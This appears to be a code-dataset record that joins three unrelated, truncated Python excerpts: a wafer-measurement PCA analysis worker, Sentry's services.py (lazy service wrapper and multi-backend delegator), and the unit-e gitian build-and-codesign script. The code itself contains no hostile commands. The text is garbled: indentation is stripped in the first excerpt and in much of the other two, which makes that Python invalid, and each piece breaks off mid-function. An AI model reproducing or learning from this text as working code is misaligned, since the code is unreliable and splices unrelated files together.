df_biplot.reset_index(drop = True, inplace = True)
else:
self.StepTool['Tool & Chamber'] = self.StepTool['Tool'] + " " + self.StepTool['Chamber']
self.StepTool.drop(['Tool','Chamber'], axis=1, inplace = True)
df_biplot = pd.merge(self.StepTool, pd.merge(df_wafer_class, df_biplot, how = "left", on = info_header), how = "left", on = 'Scribe')
df_biplot.drop_duplicates(subset=['Wafer_Alias','Scribe'], inplace = True)
df_biplot.reset_index(drop = True, inplace = True)
df_biplot[['Classification','Tool & Chamber']].replace('', np.nan, inplace=True)
df_biplot.dropna(subset=['Classification','Tool & Chamber'], inplace=True)
df_biplot.reset_index(drop = True, inplace = True)
self.data.emit([df_combined_data, df_biplot])
self.principal_components.emit(PCA[1].round(3))
self.PC_barplot.emit(PCA[1])
self.screeplot.emit(PCA[0])
self.biplot.emit([PCA[3], df_biplot])
end = time.time()
elapsed = (end - start)/60
self.system_log.emit('Analysis Completed!')
self.system_log.emit(f"Elapsed time: {math.floor(float(format(elapsed)))} min {np.round(((float(format(elapsed)) - math.floor(float(format(elapsed))))*60),decimals = 0)} sec")
def data_preparation(self, df_et_wmap_raw):
df_data = df_et_wmap_raw[0]
param_name = df_et_wmap_raw[1]
wmap_raw_value_index = df_data.columns.get_loc('wmap')
stored_wmap_raw_data = []
stored_data_section = []
expanded_data_column = []
expanded_data_wafer = []
"Finalized data set"
self.system_log.emit("Preparing data...")
# Unpack ET site level data from wmap
for row in range(len(df_data)):
wmap_raw_value_str = df_data.loc[row][wmap_raw_value_index]
wmap_raw_value = wmap_raw_value_str.replace(';', '')
wmap_raw_value = wmap_raw_value.split(',')
wmap_raw_value = list(filter(None, wmap_raw_value))
wmap_raw_value_filtered = []
for element in wmap_raw_value:
element1 = element.split(':')
element1[0] = int(element1[0])
element1[1] = float(element1[1])
element1 = tuple(element1)
wmap_raw_value_filtered.append(element1)
progression = np.round((row/len(df_data))*100, | |
<filename>src/sentry/utils/services.py
from __future__ import absolute_import
import functools
import inspect
import itertools
import logging
import threading
import six
from django.utils.functional import empty, LazyObject
from sentry.utils import warnings
from sentry.utils.concurrent import FutureSet, ThreadedExecutor
from .imports import import_string
logger = logging.getLogger(__name__)
class Service(object):
    """Base class for swappable Sentry service backends."""

    # Names exposed through ``LazyServiceWrapper.expose``.
    __all__ = ()

    def validate(self):
        """
        Check the settings for this backend (i.e. such as proper connection
        info).
        Raise ``InvalidConfiguration`` if there is a configuration error.
        """

    def setup(self):
        """
        Perform any one-time initialization this service needs.
        """
class LazyServiceWrapper(LazyObject):
    """
    Lazily instantiates a standard Sentry service class.
    >>> LazyServiceWrapper(BaseClass, 'path.to.import.Backend', {})
    Provides an ``expose`` method for dumping public APIs to a context, such as
    module locals:
    >>> service = LazyServiceWrapper(...)
    >>> service.expose(locals())
    """

    def __init__(self, backend_base, backend_path, options, dangerous=()):
        super(LazyServiceWrapper, self).__init__()
        # Write straight into __dict__ to bypass LazyObject's attribute
        # proxying, which would otherwise forward these assignments to the
        # (not yet created) wrapped backend.
        self.__dict__.update(
            {
                '_backend': backend_path,
                '_options': options,
                '_base': backend_base,
                '_dangerous': dangerous,
            }
        )

    def __getattr__(self, name):
        # Instantiate the real backend on first attribute access.
        if self._wrapped is empty:
            self._setup()
        return getattr(self._wrapped, name)

    def _setup(self):
        # Import and instantiate the configured backend, warning when it is
        # one of the backends flagged as unsuitable for production use.
        backend = import_string(self._backend)
        assert issubclass(backend, Service)
        if backend in self._dangerous:
            warnings.warn(
                warnings.UnsupportedBackend(
                    u'The {!r} backend for {} is not recommended '
                    'for production use.'.format(self._backend, self._base)
                )
            )
        instance = backend(**self._options)
        self._wrapped = instance

    def expose(self, context):
        # Copy the base class's public API (plus validate/setup) into the
        # given namespace; methods become thin forwarding wrappers so the
        # backend is still created lazily on first call.
        base = self._base
        for key in itertools.chain(base.__all__, ('validate', 'setup')):
            if inspect.ismethod(getattr(base, key)):
                # Bind `key` via the outer lambda to avoid the late-binding
                # closure pitfall inside the loop.
                context[key] = (lambda f: lambda *a, **k: getattr(self, f)(*a, **k))(key)
            else:
                context[key] = getattr(base, key)
def resolve_callable(value):
    """Return *value* if it is callable, or import it if it is a dotted path.

    Raises TypeError for any other input.
    """
    if callable(value):
        return value
    if isinstance(value, six.string_types):
        return import_string(value)
    raise TypeError('Expected callable or string')
class Context(object):
    """Per-request delegation state handed to selector/callback functions."""

    def __init__(self, request, backends):
        self.request = request
        self.backends = backends  # mapping of base class -> active backend

    def copy(self):
        """Return a Context sharing the request but owning its backend map."""
        return Context(self.request, self.backends.copy())
class ServiceDelegator(Service):
"""\
This is backend that coordinates and delegates method execution to multiple
backends. It can be used to route requests to different backends based on
method arguments, as well as execute the same request against multiple
backends in parallel for testing backend performance and data consistency.
The backends are provided as mapping of backend name to configuration
parameters:
'redis': {
'path': 'sentry.tsdb.redis.RedisTSDB',
'executor': {
'path': 'sentry.utils.services.ThreadedExecutor',
'options': {
'worker_count': 1,
},
},
},
'dummy': {
'path': 'sentry.tsdb.dummy.DummyTSDB',
'executor': {
'path': 'sentry.utils.services.ThreadedExecutor',
'options': {
'worker_count': 4,
},
},
},
# ... etc ...
The backends used for a method call are determined by a selector function
which is provided with the current context, the method name (as a string)
and arguments (in the form returned by ``inspect.getcallargs``) and
expected to return a list of strings which correspond to names in the
backend mapping. (This list should contain at least one member.) The first
item in the result list is considered the "primary backend". The remainder
of the items in the result list are considered "secondary backends". The
result value of the primary backend will be the result value of the
delegated method (to callers, this appears as a synchronous method call.)
The secondary backends are called asynchronously in the background. (To
receive the result values of these method calls, provide a callback_func,
described below.) If the primary backend name returned by the selector
function doesn't correspond to any registered backend, the function will
raise a ``InvalidBackend`` exception. If any referenced secondary backends
are not registered names, they will be discarded and logged.
The members and ordering of the selector function result (and thus the
primary and secondary backends for a method call) may vary from call to
call based on the calling arguments or some other state. For example, some
calls may use a different primary backend based on some piece of global
state (e.g. some property of a web request), or a secondary backend
undergoing testing may be included based on the result of a random number
generator (essentially calling it in the background for a sample of calls.)
The selector function and callback function can be provided as either:
- A dotted import path string (``path.to.callable``) that will be
imported at backend instantiation, or
- A reference to a callable object.
Implementation notes:
- Only method access is delegated to the individual backends. Attribute
values are returned from the base backend. Only methods that are defined
    on the base backend are eligible for delegation (since these methods are
considered the public API.)
- The backend makes no attempt to synchronize common backend option values
between backends (e.g. TSDB rollup configuration) to ensure equivalency
of request parameters based on configuration.
- Each backend is associated with an executor pool which defaults to a
thread pool implementation unless otherwise specified in the backend
configuration. If the backend itself is not thread safe (due to socket
access, etc.), it's recommended to specify a pool size of 1 to ensure
exclusive access to resources. Each executor is started when the first
task is submitted.
- The request is added to the request queue of the primary backend using a
blocking put. The request is added to the request queue(s) of the
secondary backend(s) as a non-blocking put (if these queues are full, the
request is rejected and the future will raise ``Queue.Full`` when
attempting to retrieve the result.)
- The ``callback_func`` is called after all futures have completed, either
successfully or unsuccessfully. The function parameters are:
- the context,
- the method name (as a string),
- the calling arguments (as returned by ``inspect.getcallargs``),
- the backend names (as returned by the selector function),
- a list of results (as either a ``Future``, or ``None`` if the backend
was invalid) of the same length and ordering as the backend names.
"""
    class InvalidBackend(Exception):
        """\
        Raised when the selector function names a primary backend that is
        not present in the registered backend mapping.
        """
    class State(threading.local):
        # Thread-local so each thread tracks its own active delegation context.
        def __init__(self):
            # Current Context for this thread, or None outside a delegated call.
            self.context = None

    # Class-private (name-mangled to _ServiceDelegator__state), shared holder
    # of the per-thread delegation state.
    __state = State()
def __init__(self, backend_base, backends, selector_func, callback_func=None):
self.__backend_base = import_string(backend_base)
def load_executor(options):
path = options.get('path')
if path is None:
executor_cls = ThreadedExecutor
else:
executor_cls = import_string(path)
return executor_cls(**options.get('options', {}))
self.__backends = {}
for name, options in backends.items():
self.__backends[name] = (
import_string(options['path'])(**options.get('options', {})),
load_executor(options.get('executor', {})),
)
self.__selector_func = resolve_callable(selector_func)
if callback_func is not None:
self.__callback_func = resolve_callable(callback_func)
else:
self.__callback_func = None
def validate(self):
for backend, executor in self.__backends.values():
backend.validate()
def setup(self):
for backend, executor in self.__backends.values():
backend.setup()
def __getattr__(self, attribute_name):
# When deciding how to handle attribute accesses, we have three
# different possible outcomes:
# 1. If this is defined as a method on the base implementation, we are
# able delegate it to the backends based on the selector function.
# 2. If this is defined as an attribute on the base implementation, we
# are able to (immediately) return that as the value. (This also
# mirrors the behavior of ``LazyServiceWrapper``, which will cache
# any attribute access during ``expose``, so we can't delegate
# attribute access anyway.)
# 3. If this isn't defined at all on the base implementation, we let
# the ``AttributeError`` raised by ``getattr`` propagate (mirroring
# normal attribute access behavior for a missing/invalid name.)
base_value = getattr(self.__backend_base, attribute_name)
if not inspect.ismethod(base_value):
return base_value
def execute(*args, **kwargs):
context = type(self).__state.context
# If there is no context object already set in the thread local
# state, we are entering the delegator for the first time and need
# to create a new context.
if context is None:
from sentry.app import env # avoids a circular import
context = Context(env.request, {})
# If this thread already has an active backend for this base class,
# we can safely call that backend synchronously without delegating.
if self.__backend_base in context.backends:
backend = context.backends[self.__backend_base]
return getattr(backend, attribute_name)(*args, **kwargs)
# Binding the call arguments to named arguments has two benefits:
# 1. These values always be passed in the same form to the selector
# function and callback, regardless of how they were passed to
# the method itself (as positional arguments, keyword arguments,
# etc.)
# 2. This ensures that the given arguments are those supported by
# the base backend itself, which should be a common subset of
# arguments that are supported by all backends.
callargs = inspect.getcallargs(base_value, None, *args, **kwargs)
selected_backend_names = list(self.__selector_func(context, attribute_name, callargs))
if | |
<reponame>castarco/unit-e<gh_stars>10-100
#!/usr/bin/env python3
# Copyright (c) 2018-2019 The Bitcoin Core developers
# Copyright (c) 2019 The Unit-e developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or https://opensource.org/licenses/MIT.
import argparse
import os
import subprocess
import sys
import platform
import tempfile
from pathlib import Path
from contextlib import contextmanager
# Version of osslsigncode to download and build when no usable binary is found.
OSSLSIGNCODE_VER = '1.7.1'
# Directory the osslsigncode source tarball extracts into.
OSSLSIGNCODE_DIR = 'osslsigncode-'+OSSLSIGNCODE_VER
@contextmanager
def cd(destination_dir):
    """Temporarily change the working directory, restoring it afterwards."""
    previous_dir = os.getcwd()
    os.chdir(destination_dir)
    try:
        yield
    finally:
        # Always restore, even if the body raised.
        os.chdir(previous_dir)
class Installer:
    """ Wrapper around native package installer, supports apt-get and brew, only
    installs packages which aren't installed yet."""

    def __init__(self, backend=None, quiet=False):
        # Bug fix: the original message contained a bare '%' placeholder that
        # was never substituted; include the offending value explicitly.
        if backend not in ('apt', 'brew'):
            raise ValueError(
                "Invalid value for backend argument: '{}'. Valid values are `apt` and `brew`.".format(backend))
        self.backend = backend
        self.updated = False   # whether the package index was refreshed yet
        self.to_install = []   # packages queued by add_requirements()
        # apt supports a quiet flag; brew has no equivalent.
        self.flags = ['-qq'] if quiet and self.backend == 'apt' else []

    def backend_command(self, subcommand):
        """Return the argv list implementing *subcommand* for this backend.

        'ls' maps to the backend's package-query command; anything else is
        passed through to the package manager (with sudo for apt).
        """
        if self.backend == 'apt':
            if subcommand == 'ls':
                return ['dpkg', '-s']
            return ['sudo', 'apt-get', subcommand] + self.flags
        return ['brew', subcommand]

    def update(self):
        """Refresh the package index, at most once per Installer instance."""
        if not self.updated:
            self.updated = True
            subprocess.check_call(self.backend_command('update'))

    def try_to_install(self, *programs):
        """Attempt to install *programs*; return True on success."""
        self.update()
        print(self.backend + ': installing', ", ".join(programs))
        return subprocess.call(self.backend_command('install') + list(programs)) == 0

    def batch_install(self):
        """Install everything queued via add_requirements(); exit(1) on failure."""
        if not self.to_install:
            print(self.backend + ': nothing to install')
            return
        if not self.try_to_install(*self.to_install):
            print('Could not install packages.', file=sys.stderr)
            exit(1)
        self.to_install = []

    def is_installed(self, program):
        """Return True if *program* is already present on the system."""
        return subprocess.call(self.backend_command('ls') + [program],
                               stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) == 0

    def add_requirements(self, *programs):
        """Queue each of *programs* for batch_install() unless already installed."""
        for program in programs:
            if not self.is_installed(program):
                self.to_install.append(program)
def verify_user_specified_osslsigncode(user_spec_path):
    """Validate a user-supplied osslsigncode binary and return its resolved path.

    Raises Exception if the file does not exist or cannot be executed.
    """
    if not Path(user_spec_path).is_file():
        # Bug fix: corrected the grammar of the original error message
        # ("provided osslsign does not exists").
        raise Exception('provided osslsigncode does not exist: {}'.format(user_spec_path))
    try:
        # A working osslsigncode exits with status 255 on --version.
        if subprocess.call([user_spec_path, '--version'], stderr=subprocess.DEVNULL) != 255:
            raise Exception('cannot execute provided osslsigncode: {}'.format(user_spec_path))
    except subprocess.CalledProcessError as e:
        # NOTE(review): subprocess.call never raises CalledProcessError, so this
        # handler is effectively dead code; kept for backward compatibility.
        raise Exception('unexpected exception raised while executing provided osslsigncode: {}'.format(str(e)))
    return Path(user_spec_path).resolve()
def find_osslsigncode(user_spec_path):
    """Locate a usable osslsigncode binary.

    Preference order: an explicitly given path (validated), then whatever
    `which` finds on PATH, then a previously built copy in the local source
    tree.  Returns None when nothing usable is found.
    """
    if user_spec_path:
        return verify_user_specified_osslsigncode(user_spec_path)
    # A working osslsigncode exits with status 255 on --version.
    which_proc = subprocess.Popen(['which', 'osslsigncode'],
                                  stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
    if which_proc.wait() == 0:
        candidate = which_proc.communicate()[0].split()[0].decode()
        if subprocess.call([candidate, '--version'], stderr=subprocess.DEVNULL) == 255:
            return candidate
    local_build = Path(OSSLSIGNCODE_DIR, 'osslsigncode')
    if local_build.is_file() and subprocess.call([local_build, '--version'], stderr=subprocess.DEVNULL) == 255:
        return local_build.resolve()
    return None
def install_osslsigner():
    """Download, verify, patch and build osslsigncode; return the binary path."""
    patch_name = 'osslsigncode-Backports-to-' + OSSLSIGNCODE_VER + '.patch'
    tarball = 'osslsigncode-' + OSSLSIGNCODE_VER + '.tar.gz'
    subprocess.check_call(['wget', '-N', 'https://downloads.sourceforge.net/project/osslsigncode/osslsigncode/' + tarball])
    subprocess.check_call(['wget', '-N', 'https://bitcoincore.org/cfields/' + patch_name])
    # Verify both downloads against pinned SHA-256 digests before using them.
    subprocess.check_call(["echo 'a8c4e9cafba922f89de0df1f2152e7be286aba73f78505169bc351a7938dd911 " + patch_name + "' | sha256sum -c"], shell=True)
    subprocess.check_call(["echo 'f9a8cdb38b9c309326764ebc937cba1523a3a751a7ab05df3ecc99d18ae466c9 " + tarball + "' | sha256sum -c"], shell=True)
    subprocess.check_call(['tar', '-xzf', tarball])
    subprocess.check_call(['patch -p1 < ../' + patch_name], shell=True, cwd=OSSLSIGNCODE_DIR)
    subprocess.check_call(['./configure', '--without-gsf', '--without-curl', '--disable-dependency-tracking'], cwd=OSSLSIGNCODE_DIR)
    subprocess.check_call(['make'], cwd=OSSLSIGNCODE_DIR)
    return Path(OSSLSIGNCODE_DIR, 'osslsigncode').resolve()
def install_libssl_dev(apt):
    """Queue the correct libssl development package for this distribution.

    Older releases (Ubuntu < 18, Debian < 9) ship OpenSSL 1.0 as plain
    libssl-dev; newer ones need the explicit libssl1.0-dev package.
    """
    # NOTE(review): platform.dist() was removed in Python 3.8; running this on
    # a modern interpreter requires migrating to the third-party `distro`
    # package -- confirm the target Python version.
    dist_str = platform.dist()
    dist_type = dist_str[0]
    # Bug fix: the original stripped dots and compared against 1800/900, which
    # mis-classified versions whose digit count differs (e.g. Debian '10' ->
    # 10 < 900 was treated as an old release). Compare major versions instead.
    major_version = int(dist_str[1].split('.')[0] or 0)
    if (dist_type == 'Ubuntu' and major_version < 18) or (dist_type == 'Debian' and major_version < 9):
        apt.add_requirements('libssl-dev')
    else:
        apt.add_requirements('libssl1.0-dev')
def install_linux_deps(args):
    """Install all build prerequisites on a Linux host via apt.

    Collects a single batch of apt requirements based on the chosen
    virtualization backend (KVM, docker or LXC), installs docker itself when
    requested but missing, and builds osslsigncode from source when Windows
    code signing is requested and no usable binary was found.
    """
    installer = Installer(backend='apt', quiet=args.quiet)
    installer.add_requirements('ruby', 'git', 'make')
    if args.kvm:
        installer.add_requirements('apt-cacher-ng', 'python-vm-builder', 'qemu-kvm', 'qemu-utils')
    elif args.docker:
        docker_missing = subprocess.call(['docker', '--version']) != 0
        # Try the distro package first, then the upstream one.
        if docker_missing and not installer.try_to_install('docker.io') and not installer.try_to_install('docker-ce'):
            print('Cannot find any way to install docker', file=sys.stderr)
            exit(1)
    else:
        installer.add_requirements('apt-cacher-ng', 'lxc', 'debootstrap')
    should_make_ossl = False
    if args.codesign and args.windows:
        args.osslsigncode_path = find_osslsigncode(args.osslsigncode_path)
        if not args.osslsigncode_path:
            # No usable binary anywhere: queue the build-time dependencies
            # and remember to compile one after batch_install().
            should_make_ossl = True
            installer.add_requirements('tar', 'wget', 'patch', 'autoconf')
            install_libssl_dev(installer)
    installer.batch_install()
    if should_make_ossl:
        args.osslsigncode_path = install_osslsigner()
def create_bin_symlink(link, target):
    """Create bin/<link> -> target unless an entry already occupies the name.

    Checks is_symlink() in addition to exists(): Path.exists() follows
    symlinks and returns False for a broken link, in which case symlink_to()
    would raise FileExistsError even though the directory entry is present.
    """
    bin_path = Path("bin", link)
    if not bin_path.is_symlink() and not bin_path.exists():
        bin_path.symlink_to(target)
def install_mac_deps(args):
    """Install build prerequisites on macOS (docker-only workflow).

    Aborts unless --docker was given and docker itself is already installed;
    then installs ruby and GNU coreutils via brew and exposes the GNU tools
    under their Linux names via bin/ symlinks.
    """
    if not args.docker:
        print('Mac can only work with docker, re-run with --docker flag.', file=sys.stderr)
        exit(1)
    if subprocess.call(['docker', '--version']) != 0:
        print('Please install docker manually, e.g. with `brew cask install docker`.', file=sys.stderr)
        exit(1)
    installer = Installer(backend='brew')
    installer.add_requirements('ruby', 'coreutils')
    installer.batch_install()
    # coreutils installs GNU date/sha256sum with a `g` prefix.
    for link_name, target in (("date", "/usr/local/bin/gdate"), ("sha256sum", "/usr/local/bin/gsha256sum")):
        create_bin_symlink(link_name, target)
def install_deps(args):
    """Dispatch dependency installation based on the host operating system."""
    handlers = {'Linux': install_linux_deps, 'Darwin': install_mac_deps}
    system_str = platform.system()
    handler = handlers.get(system_str)
    if handler is None:
        print("Unsupported system '%s'." % system_str, file=sys.stderr)
        exit(1)
    handler(args)
def setup(args):
    """One-time environment preparation.

    Clones the signature repo, gitian-builder and the project itself when not
    yet present, then creates the gitian base VM/container for the selected
    backend. On bionic LXC hosts the lxc-net bridge is patched and a reboot
    is requested.
    """
    if not Path('unit-e-sigs').is_dir():
        subprocess.check_call(['git', 'clone', '<EMAIL>:dtr-org/unit-e-sigs.git'])
    if not Path('gitian-builder').is_dir():
        subprocess.check_call(['git', 'clone', 'https://github.com/devrandom/gitian-builder.git'])
    if not Path(args.git_dir).is_dir():
        subprocess.check_call(['git', 'clone', args.url, args.git_dir])
    image_cmd = ['bin/make-base-vm', '--suite', 'bionic', '--arch', 'amd64']
    # KVM needs no extra flag; docker and LXC each select their backend.
    if args.docker:
        image_cmd.append('--docker')
    elif not args.kvm:
        image_cmd.append('--lxc')
    subprocess.check_call(image_cmd, cwd='gitian-builder')
    if args.is_bionic and not args.kvm and not args.docker:
        subprocess.check_call(['sudo', 'sed', '-i', 's/lxcbr0/br0/', '/etc/default/lxc-net'])
        print('Reboot is required')
        exit(0)
def gitian_descriptors(args, platform_str):
    """Return the relative path of the gitian descriptor for a platform.

    `args` is accepted for signature uniformity with the other steps but is
    not used.
    """
    return '../work/gitian-descriptors/gitian-{}.yml'.format(platform_str)
def build(args):
    """Run the gitian builds for every selected platform.

    For each platform enabled on ``args`` (linux / windows / macos): run
    gbuild against that platform's descriptor, sign the build assertion with
    ``args.sign_prog`` as ``args.signer``, and move the produced artifacts
    into ``unit-e-binaries/<version>``. The Windows build additionally
    stashes its unsigned tarball in gitian-builder/inputs for the later
    detached-signing step. With ``args.commit_files`` the assertion
    signatures are committed to the unit-e-sigs repository.
    """
    os.makedirs('unit-e-binaries/' + args.version, exist_ok=True)
    print('\nBuilding Dependencies\n')
    with cd('gitian-builder'):
        os.makedirs('inputs', exist_ok=True)
        # Pre-fetch the depends sources into the shared cache so the gbuild
        # runs below do not need to hit the network.
        subprocess.check_call(['make', '-C', Path('../', args.git_dir, 'depends'), 'download', 'SOURCES_PATH=' + os.getcwd() + '/cache/common'])
        if args.linux:
            print('\nCompiling ' + args.version + ' Linux')
            subprocess.check_call(['bin/gbuild', '-j', args.jobs, '-m', args.memory, '--commit', 'unit-e='+args.commit, '--url', 'unit-e='+args.url, gitian_descriptors(args, 'linux')])
            subprocess.check_call(['bin/gsign', '-p', args.sign_prog, '--signer', args.signer, '--release', args.version+'-linux', '--destination', '../unit-e-sigs/', gitian_descriptors(args, 'linux')])
            subprocess.check_call('mv build/out/unit-e-*.tar.gz build/out/src/unit-e-*.tar.gz ../unit-e-binaries/'+args.version, shell=True)
        if args.windows:
            print('\nCompiling ' + args.version + ' Windows')
            subprocess.check_call(['bin/gbuild', '-j', args.jobs, '-m', args.memory, '--commit', 'unit-e='+args.commit, '--url', 'unit-e='+args.url, gitian_descriptors(args, 'win')])
            subprocess.check_call(['bin/gsign', '-p', args.sign_prog, '--signer', args.signer, '--release', args.version+'-win-unsigned', '--destination', '../unit-e-sigs/', gitian_descriptors(args, 'win')])
            # Keep the unsigned tarball around: codesign/sign consume it later.
            subprocess.check_call('mv build/out/unit-e-*-win-unsigned.tar.gz inputs/', shell=True)
            subprocess.check_call('mv build/out/unit-e-*.zip build/out/unit-e-*.exe ../unit-e-binaries/'+args.version, shell=True)
        if args.macos:
            print('\nCompiling ' + args.version + ' MacOS')
            subprocess.check_call(['bin/gbuild', '-j', args.jobs, '-m', args.memory, '--commit', 'unit-e='+args.commit, '--url', 'unit-e='+args.url, gitian_descriptors(args, 'osx')])
            subprocess.check_call(['bin/gsign', '-p', args.sign_prog, '--signer', args.signer, '--release', args.version+'-osx-unsigned', '--destination', '../unit-e-sigs/', gitian_descriptors(args, 'osx')])
            subprocess.check_call('mv build/out/unit-e-*.tar.gz ../unit-e-binaries/'+args.version, shell=True)
    if args.commit_files:
        # Commit only the signer's own assertion directories.
        print('\nCommitting '+args.version+' Unsigned Sigs\n')
        with cd('unit-e-sigs'):
            if args.linux:
                subprocess.check_call(['git', 'add', args.version+'-linux/'+args.signer])
            if args.windows:
                subprocess.check_call(['git', 'add', args.version+'-win-unsigned/'+args.signer])
            if args.macos:
                subprocess.check_call(['git', 'add', args.version+'-osx-unsigned/'+args.signer])
            subprocess.check_call(['git', 'commit', '-m', 'Add '+args.version+' unsigned sigs for '+args.signer])
def get_signatures_path(platform_str, version):
    """Absolute path of the detached-signatures tarball for platform/version."""
    tarball_name = 'unit-e-' + platform_str + '-signatures.tar.gz'
    return Path('unit-e-sigs', version + '-detached', tarball_name).resolve()
def codesign_windows(osslsign_path, version, win_code_cert_path, win_code_key_path):
    """Authenticode-sign the unsigned Windows executables and extract
    detached PEM signatures into the unit-e-sigs detached tarball.

    Refuses to run if the signatures tarball already exists. osslsigncode
    prompts for the key passphrase interactively (-askpass).
    """
    gitian_dir = Path('gitian-builder').resolve()
    signatures_tarball = get_signatures_path('win', version)
    if signatures_tarball.is_file():
        print('Signatures already present at:', signatures_tarball, '\nI cowardly refuse to continue', file=sys.stderr)
        exit(1)
    signatures_tarball.parent.mkdir(exist_ok=True)
    print('\nSigning ' + version + ' Windows')
    with tempfile.TemporaryDirectory() as build_dir:
        # Work on a copy of the unsigned tarball produced by build().
        subprocess.check_call(['cp', 'inputs/unit-e-' + version + '-win-unsigned.tar.gz', Path(build_dir, 'unit-e-win-unsigned.tar.gz')], cwd=gitian_dir)
        subprocess.check_call(['tar', '-xzf', 'unit-e-win-unsigned.tar.gz'], cwd=build_dir)
        for fp in Path(build_dir).glob('unsigned/*.exe'):
            # Sign each executable, then strip the signature back out as a
            # detached PEM next to it.
            subprocess.check_call([osslsign_path, 'sign', '-certs', win_code_cert_path, '-in', fp, '-out', str(fp)+'-signed', '-key', win_code_key_path, '-askpass'])
            subprocess.check_call([osslsign_path, 'extract-signature', '-pem', '-in', str(fp)+'-signed', '-out', str(fp)+'.pem'])
        # Bundle only the detached .exe.pem files (relative names, tar run
        # from inside the unsigned/ directory).
        subprocess.check_call(['tar', '-czf', signatures_tarball, *[path.name for path in Path(build_dir, 'unsigned').glob('*.exe.pem')]], cwd=Path(build_dir, 'unsigned'))
def codesign(args):
    """Code-sign the Windows build and optionally commit the detached sigs."""
    if not args.windows:
        print('Warning: codesigning requested, but windows not in the --os flag.', file=sys.stderr)
        return
    codesign_windows(args.osslsigncode_path, args.version, args.win_code_cert_path, args.win_code_key_path)
    if not args.commit_files:
        return
    print('\nCommitting '+args.version+' Detached Sigs\n')
    detached_tarball = Path(args.version + '-detached', 'unit-e-win-signatures.tar.gz')
    subprocess.check_call(['git', 'add', detached_tarball], cwd='unit-e-sigs')
    subprocess.check_call(['git', 'commit', '-a', '-m', 'Add '+args.version+' detached signatures by '+args.signer], cwd='unit-e-sigs')
def sign(args):
    """Attach the detached Windows signatures to the binaries via gitian.

    Downloads the osslsigncode sources the win-signer descriptor builds
    against, stages the detached signatures tarball produced by codesign(),
    runs the win-signer gbuild, signs the resulting assertion and moves the
    final setup executables into unit-e-binaries/<version>. With
    ``args.commit_files`` the signed-build assertion is committed.
    """
    if not args.windows:
        print('Warning: signing requested, but windows not in the --os flag.', file=sys.stderr)
        return
    gitian_dir = Path('gitian-builder').resolve()
    # Inputs required by the win-signer descriptor.
    subprocess.check_call(['wget', '-N', '-P', 'inputs', 'https://downloads.sourceforge.net/project/osslsigncode/osslsigncode/osslsigncode-'+OSSLSIGNCODE_VER+'.tar.gz'], cwd=gitian_dir)
    subprocess.check_call(['wget', '-N', '-P', 'inputs', 'https://bitcoincore.org/cfields/osslsigncode-Backports-to-'+OSSLSIGNCODE_VER+'.patch'], cwd=gitian_dir)
    signatures_tarball = get_signatures_path('win', args.version)
    if not signatures_tarball.is_file():
        print('Signatures not present at:', signatures_tarball, file=sys.stderr)
        exit(1)
    print('\nSigning ' + args.version + ' Windows')
    # Stage the detached signatures and the unsigned build under the fixed
    # names the descriptor expects.
    subprocess.check_call(['cp', signatures_tarball, 'inputs/unit-e-win-signatures.tar.gz'], cwd=gitian_dir)
    subprocess.check_call(['cp', 'inputs/unit-e-' + args.version + '-win-unsigned.tar.gz', 'inputs/unit-e-win-unsigned.tar.gz'], cwd=gitian_dir)
    subprocess.check_call(['bin/gbuild', '-i', '--commit', 'signature=master', gitian_descriptors(args, 'win-signer')], cwd=gitian_dir)
    subprocess.check_call(['bin/gsign', '-p', args.sign_prog, '--signer', args.signer, '--release', args.version+'-win-signed', '--destination', '../unit-e-sigs/', gitian_descriptors(args, 'win-signer')], cwd=gitian_dir)
    subprocess.check_call('mv build/out/unit-e-*win64-setup.exe ../unit-e-binaries/'+args.version, shell=True, cwd=gitian_dir)
    subprocess.check_call('mv build/out/unit-e-*win32-setup.exe ../unit-e-binaries/'+args.version, shell=True, cwd=gitian_dir)
    if args.commit_files:
        print('\nCommitting '+args.version+' Signed Sigs\n')
        subprocess.check_call(['git', 'add', args.version+'-win-signed/'+args.signer], cwd='unit-e-sigs')
        subprocess.check_call(['git', 'commit', '-a', '-m', 'Add '+args.version+' signed binary sigs for '+args.signer], cwd='unit-e-sigs')
def verify(args):
    """Verify the builds with gverify.

    Exits with an error if any present signature fails verification (via
    check_call) or if any of the expected signature directories is missing.
    """
    gitian_builder = Path('gitian-builder')
    sigs_path = Path('unit-e-sigs')
    expected_builds = (
        ('linux', 'linux', 'Linux'),
        ('win-unsigned', 'win', 'Windows'),
        ('osx-unsigned', 'osx', 'MacOS'),
        ('win-signed', 'win-signer', 'Signed Windows'),
    )
    missing_builds = []
    for sig_path_suffix, descriptor_suffix, build_name in expected_builds:
        build_sig_dir = args.version + '-' + sig_path_suffix
        if not Path(sigs_path, build_sig_dir).is_dir():
            print('\nSkipping v%s %s as it is not present\n' % (args.version, build_name))
            missing_builds.append(build_name)
            continue
        print('\nVerifying v%s %s\n' % (args.version, build_name))
        descriptor = gitian_descriptors(args, descriptor_suffix)
        subprocess.check_call(['bin/gverify', '-v', '-d', '../unit-e-sigs/', '-r', build_sig_dir, descriptor], cwd=gitian_builder)
    if missing_builds:
        print('Some builds were missing, please refer to previous logs.', file=sys.stderr)
        exit(1)
def prepare_git_dir(args):
    """Resolve args.commit and args.version, then check out the build commit.

    With args.pull the version is treated as a PR number: the PR merge ref is
    fetched both in the project clone and in gitian-builder's cached clone,
    args.commit is set to the merge head and args.version is rewritten to
    'pull-<n>'.
    """
    with cd(args.git_dir):
        if args.pull:
            subprocess.check_call(['git', 'fetch', args.url, 'refs/pull/'+args.version+'/merge'])
            # NOTE(review): this chdir escapes the cd() context; whether the
            # original directory is restored afterwards depends on the
            # project's cd implementation -- confirm.
            os.chdir('../gitian-builder/inputs/unit-e')
            subprocess.check_call(['git', 'fetch', args.url, 'refs/pull/'+args.version+'/merge'])
            # encoding='utf8' already implies text mode, so
            # universal_newlines=True is redundant here.
            args.commit = subprocess.check_output(['git', 'show', '-s', '--format=%H', 'FETCH_HEAD'], universal_newlines=True, encoding='utf8').strip()
            args.version = 'pull-' + args.version
        print(args.commit)
        if not args.skip_checkout:
            subprocess.check_call(['git', 'fetch'])
            subprocess.check_call(['git', 'checkout', args.commit])
# Keyword-only arguments (PEP 3102) prevent callers from accidentally
# swapping source and target.
def prepare_gitian_descriptors(*, source, target, hosts=None):
    """Copy all gitian descriptor *.yml files from `source` into `target`.

    When `hosts` is given, every line starting with ' HOSTS=' is rewritten to
    HOSTS="<hosts>"; all other lines are copied verbatim. The target
    directory is created if necessary.
    """
    source_dir = Path(source)
    target_dir = Path(target)
